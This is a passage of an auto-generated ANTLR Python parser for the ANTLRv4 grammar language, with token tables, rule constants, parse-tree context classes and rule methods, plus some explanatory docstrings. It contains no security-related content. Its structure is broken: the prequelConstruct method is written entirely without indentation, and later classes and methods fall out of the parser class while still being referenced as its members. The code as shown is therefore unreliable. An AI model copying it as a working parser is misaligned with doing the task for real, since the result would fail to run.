"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"'import'", "'fragment'", "'lexer'", "'parser'", "'grammar'",
"'protected'", "'public'", "'private'", "'returns'",
"'locals'", "'throws'", "'catch'", "'finally'", "'mode'" ]
symbolicNames = [ "<INVALID>", "TOKEN_REF", "RULE_REF", "LEXER_CHAR_SET",
"DOC_COMMENT", "HEADER", "BLOCK_COMMENT", "LINE_COMMENT",
"INT", "STRING_LITERAL", "UNTERMINATED_STRING_LITERAL",
"BEGIN_ARGUMENT", "BEGIN_ACTION", "OPTIONS", "TOKENS",
"CHANNELS", "IMPORT", "FRAGMENT", "LEXER", "PARSER",
"GRAMMAR", "PROTECTED", "PUBLIC", "PRIVATE", "RETURNS",
"LOCALS", "THROWS", "CATCH", "FINALLY", "MODE", "COLON",
"COLONCOLON", "COMMA", "SEMI", "LPAREN", "RPAREN",
"LBRACE", "RBRACE", "RARROW", "LT", "GT", "ASSIGN",
"QUESTION", "STAR", "PLUS_ASSIGN", "PLUS", "OR", "DOLLAR",
"RANGE", "DOT", "AT", "POUND", "NOT", "ID", "WS",
"ERRCHAR", "END_ARGUMENT", "UNTERMINATED_ARGUMENT",
"ARGUMENT_CONTENT", "END_ACTION", "UNTERMINATED_ACTION",
"ACTION_CONTENT", "UNTERMINATED_CHAR_SET" ]
RULE_grammarSpec = 0
RULE_grammarType = 1
RULE_prequelConstruct = 2
RULE_optionsSpec = 3
RULE_option = 4
RULE_optionValue = 5
RULE_delegateGrammars = 6
RULE_delegateGrammar = 7
RULE_tokensSpec = 8
RULE_channelsSpec = 9
RULE_idList = 10
RULE_action = 11
RULE_actionScopeName = 12
RULE_actionBlock = 13
RULE_argActionBlock = 14
RULE_modeSpec = 15
RULE_rules = 16
RULE_ruleSpec = 17
RULE_parserRuleSpec = 18
RULE_exceptionGroup = 19
RULE_exceptionHandler = 20
RULE_finallyClause = 21
RULE_rulePrequel = 22
RULE_ruleReturns = 23
RULE_throwsSpec = 24
RULE_localsSpec = 25
RULE_ruleAction = 26
RULE_ruleModifiers = 27
RULE_ruleModifier = 28
RULE_ruleBlock = 29
RULE_ruleAltList = 30
RULE_labeledAlt = 31
RULE_lexerRuleSpec = 32
RULE_lexerRuleBlock = 33
RULE_lexerAltList = 34
RULE_lexerAlt = 35
RULE_lexerElements = 36
RULE_lexerElement = 37
RULE_labeledLexerElement = 38
RULE_lexerBlock = 39
RULE_lexerCommands = 40
RULE_lexerCommand = 41
RULE_lexerCommandName = 42
RULE_lexerCommandExpr = 43
RULE_altList = 44
RULE_alternative = 45
RULE_element = 46
RULE_labeledElement = 47
RULE_ebnfSuffix = 48
RULE_lexerAtom = 49
RULE_atom = 50
RULE_notSet = 51
RULE_blockSet = 52
RULE_setElement = 53
RULE_block = 54
RULE_ruleref = 55
RULE_characterRange = 56
RULE_terminal = 57
RULE_elementOptions = 58
RULE_elementOption = 59
RULE_identifier = 60
ruleNames = [ "grammarSpec", "grammarType", "prequelConstruct", "optionsSpec",
"option", "optionValue", "delegateGrammars", "delegateGrammar",
"tokensSpec", "channelsSpec", "idList", "action", "actionScopeName",
"actionBlock", "argActionBlock", "modeSpec", "rules",
"ruleSpec", "parserRuleSpec", "exceptionGroup", "exceptionHandler",
"finallyClause", "rulePrequel", "ruleReturns", "throwsSpec",
"localsSpec", "ruleAction", "ruleModifiers", "ruleModifier",
"ruleBlock", "ruleAltList", "labeledAlt", "lexerRuleSpec",
"lexerRuleBlock", "lexerAltList", "lexerAlt", "lexerElements",
"lexerElement", "labeledLexerElement", "lexerBlock",
"lexerCommands", "lexerCommand", "lexerCommandName",
"lexerCommandExpr", "altList", "alternative", "element",
"labeledElement", "ebnfSuffix", "lexerAtom", "atom",
"notSet", "blockSet", "setElement", "block", "ruleref",
"characterRange", "terminal", "elementOptions", "elementOption",
"identifier" ]
EOF = Token.EOF
TOKEN_REF=1
RULE_REF=2
LEXER_CHAR_SET=3
DOC_COMMENT=4
HEADER=5
BLOCK_COMMENT=6
LINE_COMMENT=7
INT=8
STRING_LITERAL=9
UNTERMINATED_STRING_LITERAL=10
BEGIN_ARGUMENT=11
BEGIN_ACTION=12
OPTIONS=13
TOKENS=14
CHANNELS=15
IMPORT=16
FRAGMENT=17
LEXER=18
PARSER=19
GRAMMAR=20
PROTECTED=21
PUBLIC=22
PRIVATE=23
RETURNS=24
LOCALS=25
THROWS=26
CATCH=27
FINALLY=28
MODE=29
COLON=30
COLONCOLON=31
COMMA=32
SEMI=33
LPAREN=34
RPAREN=35
LBRACE=36
RBRACE=37
RARROW=38
LT=39
GT=40
ASSIGN=41
QUESTION=42
STAR=43
PLUS_ASSIGN=44
PLUS=45
OR=46
DOLLAR=47
RANGE=48
DOT=49
AT=50
POUND=51
NOT=52
ID=53
WS=54
ERRCHAR=55
END_ARGUMENT=56
UNTERMINATED_ARGUMENT=57
ARGUMENT_CONTENT=58
END_ACTION=59
UNTERMINATED_ACTION=60
ACTION_CONTENT=61
UNTERMINATED_CHAR_SET=62
    def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
        """Build the parser over *input*, writing diagnostics to *output*."""
        super().__init__(input, output)
        self.checkVersion("4.7")  # generated against ANTLR runtime 4.7
        # Adaptive-prediction simulator over the shared ATN and DFA cache.
        self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
        self._predicates = None
    class GrammarSpecContext(ParserRuleContext):
        """Parse-tree node for grammar rule ``grammarSpec`` (auto-generated).

        The token/rule accessor methods below return the corresponding
        children of this context, or None/[] when absent.
        """

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser
            self._DOC_COMMENT = None # Token
            self.docs = list() # of Tokens
            self.gtype = None # GrammarTypeContext
            self.gname = None # IdentifierContext

        def SEMI(self):
            return self.getToken(ANTLRv4Parser.SEMI, 0)

        def rules(self):
            return self.getTypedRuleContext(ANTLRv4Parser.RulesContext,0)

        def EOF(self):
            return self.getToken(ANTLRv4Parser.EOF, 0)

        def grammarType(self):
            return self.getTypedRuleContext(ANTLRv4Parser.GrammarTypeContext,0)

        def identifier(self):
            return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

        def prequelConstruct(self, i:int=None):
            # i is None -> list of all prequelConstruct children; else the i-th.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.PrequelConstructContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.PrequelConstructContext,i)

        def modeSpec(self, i:int=None):
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.ModeSpecContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.ModeSpecContext,i)

        def DOC_COMMENT(self, i:int=None):
            if i is None:
                return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
            else:
                return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_grammarSpec

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterGrammarSpec" ):
                listener.enterGrammarSpec(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitGrammarSpec" ):
                listener.exitGrammarSpec(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitGrammarSpec" ):
                return visitor.visitGrammarSpec(self)
            else:
                return visitor.visitChildren(self)
    def grammarSpec(self):
        """Parse rule ``grammarSpec``:
        DOC_COMMENT* grammarType identifier SEMI prequelConstruct* rules modeSpec* EOF

        Auto-generated by ANTLR; ``self.state`` values index into the
        serialized ATN and must not be changed by hand.
        """

        localctx = ANTLRv4Parser.GrammarSpecContext(self, self._ctx, self.state)
        self.enterRule(localctx, 0, self.RULE_grammarSpec)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 125
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Collect any leading doc comments into localctx.docs.
            while _la==ANTLRv4Parser.DOC_COMMENT:
                self.state = 122
                localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
                localctx.docs.append(localctx._DOC_COMMENT)
                self.state = 127
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            self.state = 128
            localctx.gtype = self.grammarType()
            self.state = 129
            localctx.gname = self.identifier()
            self.state = 130
            self.match(ANTLRv4Parser.SEMI)
            self.state = 134
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Zero or more prequels: options / tokens / channels / import / @action.
            while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.OPTIONS) | (1 << ANTLRv4Parser.TOKENS) | (1 << ANTLRv4Parser.CHANNELS) | (1 << ANTLRv4Parser.IMPORT) | (1 << ANTLRv4Parser.AT))) != 0):
                self.state = 131
                self.prequelConstruct()
                self.state = 136
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            self.state = 137
            self.rules()
            self.state = 141
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Trailing lexical mode sections.
            while _la==ANTLRv4Parser.MODE:
                self.state = 138
                self.modeSpec()
                self.state = 143
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            self.state = 144
            self.match(ANTLRv4Parser.EOF)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class GrammarTypeContext(ParserRuleContext):
        """Parse-tree node for grammar rule ``grammarType`` (auto-generated)."""

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def LEXER(self):
            return self.getToken(ANTLRv4Parser.LEXER, 0)

        def GRAMMAR(self):
            return self.getToken(ANTLRv4Parser.GRAMMAR, 0)

        def PARSER(self):
            return self.getToken(ANTLRv4Parser.PARSER, 0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_grammarType

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterGrammarType" ):
                listener.enterGrammarType(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitGrammarType" ):
                listener.exitGrammarType(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitGrammarType" ):
                return visitor.visitGrammarType(self)
            else:
                return visitor.visitChildren(self)
    def grammarType(self):
        """Parse rule ``grammarType``:
        LEXER GRAMMAR | PARSER GRAMMAR | GRAMMAR

        Auto-generated by ANTLR; state numbers index the serialized ATN.
        """

        localctx = ANTLRv4Parser.GrammarTypeContext(self, self._ctx, self.state)
        self.enterRule(localctx, 2, self.RULE_grammarType)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 151
            self._errHandler.sync(self)
            token = self._input.LA(1)
            # Dispatch on the first token of the grammar header.
            if token in [ANTLRv4Parser.LEXER]:
                self.state = 146
                self.match(ANTLRv4Parser.LEXER)
                self.state = 147
                self.match(ANTLRv4Parser.GRAMMAR)
                pass
            elif token in [ANTLRv4Parser.PARSER]:
                self.state = 148
                self.match(ANTLRv4Parser.PARSER)
                self.state = 149
                self.match(ANTLRv4Parser.GRAMMAR)
                pass
            elif token in [ANTLRv4Parser.GRAMMAR]:
                self.state = 150
                self.match(ANTLRv4Parser.GRAMMAR)
                pass
            else:
                raise NoViableAltException(self)

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class PrequelConstructContext(ParserRuleContext):
        """Parse-tree node for grammar rule ``prequelConstruct`` (auto-generated)."""

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def optionsSpec(self):
            return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)

        def delegateGrammars(self):
            return self.getTypedRuleContext(ANTLRv4Parser.DelegateGrammarsContext,0)

        def tokensSpec(self):
            return self.getTypedRuleContext(ANTLRv4Parser.TokensSpecContext,0)

        def channelsSpec(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ChannelsSpecContext,0)

        def action(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ActionContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_prequelConstruct

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterPrequelConstruct" ):
                listener.enterPrequelConstruct(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitPrequelConstruct" ):
                listener.exitPrequelConstruct(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitPrequelConstruct" ):
                return visitor.visitPrequelConstruct(self)
            else:
                return visitor.visitChildren(self)
def prequelConstruct(self):
localctx = ANTLRv4Parser.PrequelConstructContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_prequelConstruct)
try:
self.state = 158
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.OPTIONS]:
self.enterOuterAlt(localctx, 1)
self.state = 153
self.optionsSpec()
pass
elif token in [ANTLRv4Parser.IMPORT]:
self.enterOuterAlt(localctx, 2)
self.state = 154
self.delegateGrammars()
pass
elif token in [ANTLRv4Parser.TOKENS]:
self.enterOuterAlt(localctx, 3)
self.state = 155
self.tokensSpec()
pass
elif token in [ANTLRv4Parser.CHANNELS]:
self.enterOuterAlt(localctx, 4)
self.state = 156
self.channelsSpec()
pass
elif token in [ANTLRv4Parser.AT]:
self.enterOuterAlt(localctx, 5)
self.state = 157
self.action()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class OptionsSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `optionsSpec` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def OPTIONS(self):
        return self.getToken(ANTLRv4Parser.OPTIONS, 0)
    def RBRACE(self):
        return self.getToken(ANTLRv4Parser.RBRACE, 0)
    def option(self, i:int=None):
        # i is None -> all option children; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.OptionContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.OptionContext,i)
    def SEMI(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.SEMI)
        else:
            return self.getToken(ANTLRv4Parser.SEMI, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_optionsSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOptionsSpec" ):
            listener.enterOptionsSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOptionsSpec" ):
            listener.exitOptionsSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitOptionsSpec" ):
            return visitor.visitOptionsSpec(self)
        else:
            return visitor.visitChildren(self)

def optionsSpec(self):
    """Parse the `optionsSpec` rule.

    Grammar (from the match/loop below):
        optionsSpec : OPTIONS (option SEMI)* RBRACE ;
    No LBRACE is matched here — presumably the OPTIONS lexer token already
    consumes the opening brace (standard in the ANTLRv4 grammar); confirm
    against the lexer. NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.OptionsSpecContext(self, self._ctx, self.state)
    self.enterRule(localctx, 6, self.RULE_optionsSpec)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 160
        self.match(ANTLRv4Parser.OPTIONS)
        self.state = 166
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Each option starts with an identifier token (TOKEN_REF or RULE_REF).
        while _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
            self.state = 161
            self.option()
            self.state = 162
            self.match(ANTLRv4Parser.SEMI)
            self.state = 168
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 169
        self.match(ANTLRv4Parser.RBRACE)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class OptionContext(ParserRuleContext):
    """Generated parse-tree context for the `option` rule.

    Labeled children set during parsing:
      name  -- IdentifierContext (left-hand side)
      value -- OptionValueContext (right-hand side)
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self.name = None # IdentifierContext
        self.value = None # OptionValueContext
    def ASSIGN(self):
        return self.getToken(ANTLRv4Parser.ASSIGN, 0)
    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
    def optionValue(self):
        return self.getTypedRuleContext(ANTLRv4Parser.OptionValueContext,0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_option
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOption" ):
            listener.enterOption(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOption" ):
            listener.exitOption(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitOption" ):
            return visitor.visitOption(self)
        else:
            return visitor.visitChildren(self)

def option(self):
    """Parse the `option` rule.

    Grammar (from the matches below):
        option : name=identifier ASSIGN value=optionValue ;
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.OptionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 8, self.RULE_option)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 171
        localctx.name = self.identifier()
        self.state = 172
        self.match(ANTLRv4Parser.ASSIGN)
        self.state = 173
        localctx.value = self.optionValue()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class OptionValueContext(ParserRuleContext):
    """Generated base context for the `optionValue` rule.

    The rule has labeled alternatives, so the parser replaces this base
    context with one of the subclasses below (StringOption, IntOption,
    ActionOption, PathOption) via copyFrom().
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_optionValue
    def copyFrom(self, ctx:ParserRuleContext):
        super().copyFrom(ctx)

class StringOptionContext(OptionValueContext):
    """optionValue alternative: value=STRING_LITERAL (labeled #stringOption)."""
    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
        super().__init__(parser)
        self.value = None # Token
        self.copyFrom(ctx)
    def STRING_LITERAL(self):
        return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStringOption" ):
            listener.enterStringOption(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStringOption" ):
            listener.exitStringOption(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitStringOption" ):
            return visitor.visitStringOption(self)
        else:
            return visitor.visitChildren(self)

class IntOptionContext(OptionValueContext):
    """optionValue alternative: value=INT (labeled #intOption)."""
    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
        super().__init__(parser)
        self.value = None # Token
        self.copyFrom(ctx)
    def INT(self):
        return self.getToken(ANTLRv4Parser.INT, 0)
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIntOption" ):
            listener.enterIntOption(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIntOption" ):
            listener.exitIntOption(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitIntOption" ):
            return visitor.visitIntOption(self)
        else:
            return visitor.visitChildren(self)

class ActionOptionContext(OptionValueContext):
    """optionValue alternative: value=actionBlock (labeled #actionOption)."""
    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
        super().__init__(parser)
        self.value = None # ActionBlockContext
        self.copyFrom(ctx)
    def actionBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterActionOption" ):
            listener.enterActionOption(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitActionOption" ):
            listener.exitActionOption(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitActionOption" ):
            return visitor.visitActionOption(self)
        else:
            return visitor.visitChildren(self)

class PathOptionContext(OptionValueContext):
    """optionValue alternative: dotted identifier path (labeled #pathOption).

    value collects every IdentifierContext of `identifier (DOT identifier)*`.
    """
    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
        super().__init__(parser)
        self._identifier = None # IdentifierContext
        self.value = list() # of IdentifierContexts
        self.copyFrom(ctx)
    def identifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
    def DOT(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.DOT)
        else:
            return self.getToken(ANTLRv4Parser.DOT, i)
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterPathOption" ):
            listener.enterPathOption(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitPathOption" ):
            listener.exitPathOption(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitPathOption" ):
            return visitor.visitPathOption(self)
        else:
            return visitor.visitChildren(self)

def optionValue(self):
    """Parse the `optionValue` rule.

    Grammar (from the dispatch below):
        optionValue : identifier (DOT identifier)*   # PathOption
                    | STRING_LITERAL                 # StringOption
                    | actionBlock                    # ActionOption
                    | INT                            # IntOption ;
    localctx is rebound to the matching labeled subclass before parsing the
    alternative. NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.OptionValueContext(self, self._ctx, self.state)
    self.enterRule(localctx, 10, self.RULE_optionValue)
    self._la = 0 # Token type
    try:
        self.state = 186
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
            localctx = ANTLRv4Parser.PathOptionContext(self, localctx)
            self.enterOuterAlt(localctx, 1)
            self.state = 175
            localctx._identifier = self.identifier()
            localctx.value.append(localctx._identifier)
            self.state = 180
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.DOT:
                self.state = 176
                self.match(ANTLRv4Parser.DOT)
                self.state = 177
                localctx._identifier = self.identifier()
                localctx.value.append(localctx._identifier)
                self.state = 182
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            pass
        elif token in [ANTLRv4Parser.STRING_LITERAL]:
            localctx = ANTLRv4Parser.StringOptionContext(self, localctx)
            self.enterOuterAlt(localctx, 2)
            self.state = 183
            localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
            pass
        elif token in [ANTLRv4Parser.BEGIN_ACTION]:
            localctx = ANTLRv4Parser.ActionOptionContext(self, localctx)
            self.enterOuterAlt(localctx, 3)
            self.state = 184
            localctx.value = self.actionBlock()
            pass
        elif token in [ANTLRv4Parser.INT]:
            localctx = ANTLRv4Parser.IntOptionContext(self, localctx)
            self.enterOuterAlt(localctx, 4)
            self.state = 185
            localctx.value = self.match(ANTLRv4Parser.INT)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DelegateGrammarsContext(ParserRuleContext):
    """Generated parse-tree context for the `delegateGrammars` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def IMPORT(self):
        return self.getToken(ANTLRv4Parser.IMPORT, 0)
    def delegateGrammar(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.DelegateGrammarContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.DelegateGrammarContext,i)
    def SEMI(self):
        return self.getToken(ANTLRv4Parser.SEMI, 0)
    def COMMA(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.COMMA)
        else:
            return self.getToken(ANTLRv4Parser.COMMA, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_delegateGrammars
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDelegateGrammars" ):
            listener.enterDelegateGrammars(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDelegateGrammars" ):
            listener.exitDelegateGrammars(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitDelegateGrammars" ):
            return visitor.visitDelegateGrammars(self)
        else:
            return visitor.visitChildren(self)

def delegateGrammars(self):
    """Parse the `delegateGrammars` rule.

    Grammar (from the match/loop below):
        delegateGrammars : IMPORT delegateGrammar (COMMA delegateGrammar)* SEMI ;
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.DelegateGrammarsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 12, self.RULE_delegateGrammars)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 188
        self.match(ANTLRv4Parser.IMPORT)
        self.state = 189
        self.delegateGrammar()
        self.state = 194
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        while _la==ANTLRv4Parser.COMMA:
            self.state = 190
            self.match(ANTLRv4Parser.COMMA)
            self.state = 191
            self.delegateGrammar()
            self.state = 196
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 197
        self.match(ANTLRv4Parser.SEMI)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DelegateGrammarContext(ParserRuleContext):
    """Generated parse-tree context for the `delegateGrammar` rule.

    value -- the single IdentifierContext naming the imported grammar.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self.value = None # IdentifierContext
    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_delegateGrammar
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDelegateGrammar" ):
            listener.enterDelegateGrammar(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDelegateGrammar" ):
            listener.exitDelegateGrammar(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitDelegateGrammar" ):
            return visitor.visitDelegateGrammar(self)
        else:
            return visitor.visitChildren(self)

def delegateGrammar(self):
    """Parse the `delegateGrammar` rule.

    Grammar (from the match below):
        delegateGrammar : value=identifier ;
    NOTE(review): the stock ANTLRv4 grammar also allows an aliasing
    `identifier ASSIGN identifier` form; this generated code only matches a
    bare identifier — presumably a deliberately simplified grammar; confirm
    against the source .g4. Generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.DelegateGrammarContext(self, self._ctx, self.state)
    self.enterRule(localctx, 14, self.RULE_delegateGrammar)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 199
        localctx.value = self.identifier()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class TokensSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `tokensSpec` rule.

    defs -- optional IdListContext of declared token names.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self.defs = None # IdListContext
    def TOKENS(self):
        return self.getToken(ANTLRv4Parser.TOKENS, 0)
    def RBRACE(self):
        return self.getToken(ANTLRv4Parser.RBRACE, 0)
    def idList(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdListContext,0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_tokensSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterTokensSpec" ):
            listener.enterTokensSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitTokensSpec" ):
            listener.exitTokensSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitTokensSpec" ):
            return visitor.visitTokensSpec(self)
        else:
            return visitor.visitChildren(self)

def tokensSpec(self):
    """Parse the `tokensSpec` rule.

    Grammar (from the match/optional below):
        tokensSpec : TOKENS defs=idList? RBRACE ;
    The idList is only parsed when the lookahead is an identifier token.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.TokensSpecContext(self, self._ctx, self.state)
    self.enterRule(localctx, 16, self.RULE_tokensSpec)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 201
        self.match(ANTLRv4Parser.TOKENS)
        self.state = 203
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        if _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
            self.state = 202
            localctx.defs = self.idList()
        self.state = 205
        self.match(ANTLRv4Parser.RBRACE)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ChannelsSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `channelsSpec` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
